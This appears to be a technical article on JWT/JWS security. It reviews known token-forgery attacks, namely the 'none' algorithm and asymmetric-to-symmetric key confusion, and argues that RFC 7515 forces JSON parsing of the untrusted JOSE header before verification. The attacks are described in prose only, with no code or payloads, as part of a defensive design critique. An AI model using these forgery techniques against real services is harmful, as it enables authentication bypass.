This article assumes the reader has at least a basic understanding of JWT and cryptographic signatures. For a very basic JWT primer, please visit the introduction to JSON Web Tokens at https://jwt.io/introduction/.
JSON Web Tokens (JWT) enjoy wide popularity, forming the basis for OpenID Connect (OIDC) and many OAuth2 solutions. They are intended to provide a mechanism for encapsulating a set of application-dependent claims within a token whose proof of origin, integrity and optionally confidentiality are cryptographically assured.
Similar standards have been proposed before. There is the Simple Web Token (SWT) where the claims are HTML form-encoded and signed using a single, fixed algorithm - HMACSHA256. Then there is the JSON Simple Sign (JSS) - predecessor of JWS and JWT. In JSS, the claims are expressed in JSON and the signing algorithm is selected by the token issuer, with the apparent goal of making JSS future-proof and not locked into use of symmetric keys, with all of their associated issues.
The JWT stack is a more modern and fully developed set of building blocks, where JWT focuses on the claims themselves and relies upon JSON Web Signature (JWS) or JSON Web Encryption (JWE) for token encapsulation. This article will focus on JWT with JWS tokenization as described in https://tools.ietf.org/html/rfc7515 .
Let’s start out by going over well known and documented vulnerabilities surrounding use of the ‘alg’ header field. Tim McLean wrote a good article, Critical vulnerabilities in JSON Web Token libraries (https://www.chosenplaintext.ca/2015/03/31/jwt-algorithm-confusion.html), where he describes a couple of the most widely known.
The exploit everyone knows about is that the JWS specifications curiously allow for a special type of algorithm known as ‘none’. When supported, it becomes trivial for an attacker to forge or alter a token by simply wiping away its signature and changing the algorithm id from whatever it was to ‘none’, knowing that the decoding library will interpret this to mean that it should not bother with any verification at all.
The other is less obvious. It involves swapping an asymmetric algorithm for a symmetric one, and using a signer’s published public verification key used by the decoding library. Since the attacker and victim decoding library will be in possession of the same key, a token can be forged or altered and signed symmetrically to exploit a library that blindly obeys the ‘alg’ value.
The ‘alg’ value vulnerabilities can be exploited to allow a forged or altered token to slip through a decoding library. There are similar attacks against keys where a victim library may be given, or induced to retrieve, a verification key of the attacker’s choice, and the whole key management approach is vulnerable to DNS and PKI exploits.
But token authenticity is only one of the concerns when using JWT. An attack surface that has not received any attention to my knowledge is the underlying JSON parser. Fundamental design flaws in the JWT stack expose its JSON parser to direct attack where a carefully crafted payload can exploit vulnerabilities in its implementation to overtake the running process, and potentially gain a foothold on its host.
JWS produces a signed object. A signed document is another type of signed object. So is a signed executable. The first rule of handling signed objects is to distrust their contents until the signature has been verified. A verified signature provides high confidence that the contents are original. If asymmetric keys have been used, it also provides a high confidence identification of the signer.
JWS (like JSS) was designed to support an unbounded set of signing algorithms. Because of this, the algorithm and key need to be known before a signature can be verified. These are stored within a structure, known as a JSON Object Signing and Encryption (JOSE) header. The JOSE header is populated and combined with the token payload, which together are signed using the algorithm and key indicated in the JOSE header. Finally, the signature is appended to the token. Since the header is included within a token’s signature, its integrity can be verified.
The recipe for decoding a JWS-encoded JWT given in RFC-7515 (https://tools.ietf.org/html/rfc7515) starts by isolating the JOSE header and sending it directly to the library’s JSON parser so that its contents may be examined. This is done before the signature has been verified, because signature verification requires information contained in the header. This is a very serious design flaw that violates the first rule of handling signed objects by forcing library implementations to pass an unknown octet sequence directly to the parser before any trust has been established - or is even possible.
Let’s look at that again. We don’t want to let an untrusted token get through the library, which is the motivation for signing the tokens in the first place. Yet the design of JWS and its decoding recipe require us to trust token contents (specifically, the JOSE header) in the process. We have no idea whether the octet stream representing the serialized header is valid JSON or even text. For all we know it could be a payload carrying shell code, carefully crafted to exploit an implementation bug in the JSON parser . The only defense available to an RFC-compliant implementation is to use a military-grade JSON parser proven to be invulnerable to all attacks. Yours probably isn’t.
The fundamental design flaw that creates the rich attack surface described above is the recursion caused by putting the metadata required for signature verification into the untrusted object.
The next design flaw is in the choice of JSON as a representation for the JOSE header. A well-defined binary header structure could have been employed that would remove the need to use a parser to access its contents, resulting in a low-risk operation to extract algorithm and key information. The JOSE specification for JWS says it’s legal to put anything you want in there as long as it’s proper JSON. And JSON itself has a rich set of potentially exploitable properties that make it difficult to safely parse: unbounded string length, numeral length, array element counts, object member counts, and object recursion; object member name repetition, empty member names, arbitrary UNICODE characters, and UTF-8 formatting; these all make parsing JSON an extremely high-risk operation.
The third design flaw is in separating algorithm ids from key ids. Allowing them to be separate creates the kinds of vulnerabilities described in Tim McClean’s article.
There are several other design flaws related to the JOSE header and its design, many of which can be countered by implementing policy in defiance of the RFC. But the really tough nut to crack is the exposure of the JSON parser.